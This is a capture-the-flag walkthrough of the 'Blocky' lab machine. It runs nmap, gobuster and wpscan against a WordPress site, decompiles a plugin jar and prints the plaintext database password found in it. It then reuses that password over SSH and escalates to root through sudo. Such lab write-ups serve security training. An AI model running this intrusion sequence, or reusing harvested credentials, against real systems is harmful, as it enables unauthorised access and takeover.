1. nmap the box: 
nmap -sC -sV -oA nmap/blocky 10.10.10.37  
-sC == run default scripts 
-sV == enumerate versions 
-oA == output results in all formats 

21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

- Box is running a wordpress site. WordPress 4.8

2. Running gobuster against the site while I investigate 
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.37/

3. Checking out the site
- index.php is the front page 
- plugins has two jar files 
-- downloading jar files 
- wiki is under construction, going to run gobuster against that as well 
-- gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.37/wiki/ 
--- nothing interesting discovered 

4. unzip the jar files 
┌──(kali㉿kali)-[~/…/JvP-prep/wordpress/blocky/jar-files]
└─$ ls -la
total 536
-rw-r--r-- 1 kali kali    883 Jul 18 10:45 BlockyCore.jar
-rw-r--r-- 1 kali kali 532928 Jul 18 10:45 griefprevention-1.11.2-3.1.1.298.jar

Taking a look at the block class file 
BlockyCore.class

decompile the class file with jd-gui: 

From this I get: 
  public String sqlHost = "localhost";
  public String sqlUser = "root";
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

keeping results in creds file
Trying password with ftp and ssh
┌──(kali㉿kali)-[~/CTF/JvP-prep/wordpress/blocky]
└─$ ftp 10.10.10.37     
Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:kali): root
331 Password required for root
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
            
┌──(kali㉿kali)-[~/CTF/JvP-prep/wordpress/blocky]
└─$ ssh root@10.10.10.37                                    
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
root@10.10.10.37's password: 
Permission denied, please try again.

5. Running WP Scan: 
wpscan --url http://10.10.10.37 --enumerate u,ap,tt,t

--url == target 
--enumerate == check the following: 
u == usernames
ap == all plugins
tt == timthumbs
t == themes 

a user named "notch" is found by the wp-scanner

6. ssh as notch and password foudn from jar file: 
┌──(kali㉿kali)-[~/CTF/JvP-prep/wordpress/blocky]
└─$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ 

7. run LinPEAS as notch: 
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group notch:
/tmp/libnetty-transport-native-epoll5393740271524010887.so
/tmp/jna-105008760
  Group adm:

  Group cdrom:

  Group sudo: <<<<<< rad! 

  Group dip:

  Group plugdev:

  Group lxd:

  Group lpadmin:

  Group sambashare:

notch@Blocky:~$ sudo su
[sudo] password for notch: 
root@Blocky:/home/notch# 

root@Blocky:/# cd root/
root@Blocky:~# ls
root.txt